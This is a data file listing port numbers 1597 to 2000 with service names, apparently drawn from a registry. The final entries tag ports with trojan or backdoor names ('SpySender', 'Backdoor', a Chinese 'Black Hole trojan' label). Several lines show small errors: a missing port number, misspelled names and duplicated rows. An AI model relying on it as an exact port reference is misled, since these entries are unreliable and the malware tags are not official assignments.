1597 orbplus-iiop
1598 picknfs
1599 simbaservices
1600 Shiv
1601 aas
1602 inspect
1603 picodbc
1604 icabrowser icabrowser
1605 slp Salutation Manager
1606 Salutation Manager
1607 stt
1608 Smart Corp. License Manager
1609 isysg-lm
1610 taurus-wh
1611 ill Inter Library Loan
1612 NetBill Transaction Server
1613 NetBill Key Repository
1614 NetBill Credential Server
1615 NetBill Authorization Server
1616 NetBill Proct Server
1617 Nimrod Inter-Agent Communication
1618 skytelnet
1619 xs-openstorage
1620 faxportwinport
1621 softdataphone
1622 ontime
1623 jaleosnd
1624 udp-sr-port
1625 svs-omagent
1636 cncp
1637 cnap
1638 cnip
1639 cert
1640 cert-responder
1641 invision
1642 isis-am
1643 isis-ambc
1645 datametrics
1646 sa-msg-port
1647 rsap rsap
1648 concurrent-lm
1649 inspect
1650 nkd
1651 shiva_confsrvr
1652 xnmp
alphatech-lm
1654 stargatealerts
1655 dec-mbadmin
1656 dec-mbadmin-h
1657 fujitsu-mmpdc
1658 sixnetudr
1659 sg-lm
1660 skip-mc-gikreq
1661 netview-aix-1
1662 netview-aix-2
1663 netview-aix-3
1664 netview-aix-4
1665 netview-aix-5
1666 netview-aix-6
1667 netview-aix-7
1668 netview-aix-8
1669 netview-aix-9
1670 netview-aix-10
1671 netview-aix-11
1672 netview-aix-12
1673 Intel Proshare Multicast
1674 Intel Proshare Multicast
1675 pdp Pacific Data Procts
1676 netcomm1
1677 groupwise
1678 prolink
1679 darcorp-lm
1681 sd-elmd
1682 lanyon-lantern
1683 ncpm-hip
1684 snaresecure
1685 n2nremote
1686 cvmon cvmon
1687 nsjtp-ctrl
1688 nsjtp-data
1689 firefox
1690 ng-umds
1691 empire-empuma
1692 sstsys-lm
1693 rrirtr
1694 rrimwm
1695 rrilwm
1696 rrifmm
1697 rrisat
1698 rsvp-encap-1
1699 rsvp-encap-2
1700 mps-raft
1701 l2f,l2tp
1702 deskshare
1703 hb-engine
1704 bcs-broker
1705 slingshot
1706 jetFORM
1707 vdmplay
1708 gat-lmd
1709 centra
1710 impera
1711 pptconference
1712 registrar resource monitoring service
1713 conferencetalk
1714 sesi-lm
1715 houdini-lm
1716 xmsg
1717 fj-hdnet
1718 h323gatedisc
1719 h323gatestat
1720 h323hostcall
1721 caicci
1722 HKS License Manager
1723 pptp
1724 csbphonemaster
1725 iden-ralp
1726 iberiagames
1727 winddx
1728 telins
1729 CityNL License Management
1730 roketz
1731 msiccp
1732 proxim
1733 sSIIPAT Protocol for Alarm Transmission
1734 Camber
1735 privatechat
1736 street-stream
1737 ultimad
1738 gamegen1
1739 webaccess
1740 encore
1741 cisco-net-mgmt
1742 3Com-nsd
1743 Cinema Graphics License Manager
1744 ncpm-ft
1745 remote-winsock
1746 ftrapid-1
1747 ftrapid-2
1748 oracle-em1
1749 aspen-services
1750 Simple Socket Library's PortMaster
1751 swiftnet
1752 Leap of Faith Research License Manager
1753 Translogic License Manager
1754 oracle-em2
1755 ms-streaming
1756 capfast-lmd
1757 cnhrp
1758 tftp-mcast
1759 SPSS License Manager
1760 www-ldap-gw
1761 cft-0
1762 cft-1
1763 cft-2
1764 cft-3
1765 cft-4
1766 cft-5
1767 cft-6
1768 cft-7
1769 bmc-net-adm
1770 bmc-net-svc
1771 vaultbase vaultbase
1772 EssWeb Gateway
1773 kmscontrol
1774 global-dtserv
1776 femis
1777 powerguardian
1779 pharmasoft
1780 dpkeyserv
1781 answersoft-lm
1782 hp-hcip
1783 Fujitsu Remote Install Service
1784 Finle License Manager
1785 windlm
1786 funk-logger
1787 funk-license
1788 psmond
1789 hello
1790 Narrative Media Streaming Protocol
1791 EA1
1792 ibm-dt-2
1793 rsc-robot
1794 cera-bcm
1795 dpi-proxy
1796 Vocaltec Server Administration
1797 uma
1798 etp
1799 netrisk
1801 Microsoft Message Que
1804 enl
1807 SpySender
1812 radius
1813 RADIUS Accounting
1814 TDP
1815 mmpft
1816 harp
1818 etftp
1819 Plato License Manager
1820 mcagent
1821 donnyworld
1822 es-elmd
1823 Unisys
1824 metrics-pas
1850 gsi
1863 msnp
1865 entp
1901 Fujitsu
1902 Fujitsu
1903 linkname
1904 Fujitsu
1905 sugp
1906 tpmd
1908 dawn
1911 mtp
1913 armadp
1914 elm-momentum
1915 facelink
1916 persona
1917 noagent
1921 noadmin
1944 close-combat
1945 dialogic-elmd
1946 tekpls
1947 hlserver
1948 eye2eye
1949 ismaeasdaqlive
1950 ismaeasdaqtest
1951 bcs-lmserver
1973 dlsrap
1981 ShockRave
1985 hsrp
1986 licensedaemon cisco license management
1987 cisco RSRB Priority 1 port
1988 cisco RSRB Priority 2 port
1989 cisco RSRB Priority 3 port
1989 cisco RSRB Priority 3 port
1990 cisco STUN Priority 1 port
1991 cisco STUN Priority 2 port
1992 cisco STUN Priority 3 port
1992 cisco STUN Priority 3 port
1993 cisco SNMP TCP port
1994 cisco serial tunnel port
1995 cisco perf port
1996 cisco Remote SRB port
1997 gdp-port
1998 x25-svc-port
1999 Backdoor
2000 黑洞(木馬)